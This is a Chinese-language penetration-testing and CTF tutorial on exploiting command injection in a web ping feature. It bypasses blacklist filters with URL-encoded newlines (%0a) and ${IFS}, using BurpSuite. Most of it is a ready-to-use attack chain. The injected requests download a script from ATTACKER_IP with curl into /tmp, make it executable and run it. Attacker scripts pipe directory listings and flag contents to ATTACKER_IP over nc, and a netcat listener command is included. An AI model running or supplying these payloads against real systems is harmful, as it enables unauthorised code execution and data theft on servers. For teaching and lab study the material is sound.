命令注入新思路:当Ping测试遇到黑名单,如何用BurpSuite配合%0a和nc优雅拿Shell?
绕过黑名单的艺术:BurpSuite与%0a在命令注入中的高阶应用
在渗透测试或CTF比赛中,命令注入漏洞往往伴随着各种过滤机制。当遇到一个看似无害的Ping测试功能时,如何突破开发者的防御,将简单的输入框转化为获取系统权限的跳板?本文将深入探讨如何利用BurpSuite的灵活性与特殊字符的巧妙组合,在受限环境中实现优雅的Shell获取。
1. 理解目标环境与限制
面对一个带有黑名单过滤的Ping命令注入点,首先需要全面评估目标环境的限制条件。典型的防御措施可能包括:
- 关键词过滤:常见命令如
bash、python、wget等被直接拦截 - 字符过滤:管道符
|、分号;、反引号等特殊字符被禁用 - 解释器缺失:目标系统可能仅安装最基本的shell环境,缺少常用工具
测试环境特征分析表:
| 特征 | 可能限制 | 应对思路 |
|---|---|---|
| 命令黑名单 | 拦截bash、nc等 | 使用替代命令或编码绕过 |
| 特殊字符过滤 | 拦截` | 、;`等 |
| 工具缺失 | 无python、php等 | 依赖系统自带工具如curl、sh |
提示:在开始实际测试前,建议先用无害命令如
ping 127.0.0.1确认基本功能正常,再逐步引入特殊字符测试过滤规则。
2. BurpSuite在命令注入测试中的核心作用
BurpSuite不仅是Web漏洞扫描工具,更是命令注入测试的瑞士军刀。其Repeater模块允许我们:
- 快速修改和重放请求
- 观察不同payload的响应差异
- 自动化测试各种字符组合
典型测试流程:
- 拦截正常Ping请求并发送到Repeater
- 逐步添加可疑字符测试过滤规则
- 系统化尝试各种编码和绕过技术
POST /ping.php HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded ip=127.0.0.1%0aid当发现%0a(URL编码的换行符)可以绕过过滤时,测试进入新阶段。换行符在Unix系统中被解释为命令分隔符,效果等同于分号但常被过滤规则忽略。
3. 受限环境下的Shell获取策略
当目标系统缺少常用工具时,需要创造性利用现有资源。以下是一个典型的解决方案:
信息收集:确认可用的系统命令
ip=127.0.0.1%0awhich%20curl%20nc%20sh文件传输:使用
curl下载工具curl attacker.com/shell.sh -o /tmp/s权限设置:通过注入点修改文件权限
ip=127.0.0.1%0achmod%20777%20/tmp/s执行脚本:运行下载的脚本
ip=127.0.0.1%0ash%20/tmp/s
常见问题与解决方案:
问题:
wget被过滤或不可用 解决:使用curl -o替代问题:无法直接反弹shell 解决:使用
nc仅传输命令输出问题:空格被过滤 解决:使用
${IFS}替代(IFS是shell的内部字段分隔符)
4. 实战案例:从注入点到Flag获取
假设目标系统过滤了大多数特殊字符但漏掉了%0a,且只安装了sh和nc。以下是完整的攻击流程:
在攻击机准备脚本:
# back.sh ls / | nc ATTACKER_IP 4444启动HTTP服务:
python3 -m http.server 80在BurpSuite中执行:
POST /ping.php HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded ip=127.0.0.1%0acurl%20ATTACKER_IP/back.sh%20-o%20/tmp/b%0achmod%20777%20/tmp/b%0ash%20/tmp/b在攻击机监听:
nc -lvnp 4444分析结果并获取Flag: 根据返回的目录结构,调整脚本读取Flag文件:
# flag.sh cat /path/to/flag | nc ATTACKER_IP 4444重复传输和执行流程:
ip=127.0.0.1%0acurl%20ATTACKER_IP/flag.sh%20-o%20/tmp/f%0achmod%20777%20/tmp/f%0ash%20/tmp/f
关键技巧:
- 使用短文件名避免空格问题(如
/tmp/b而非/tmp/back.sh) - 分阶段执行,先确认文件传输成功再尝试执行
- 保持监听端口一致简化流程
在真实渗透测试中,这种系统化的方法比随机尝试更高效。BurpSuite的History功能还能帮助我们回顾哪些payload有效,建立自己的绕过技术库。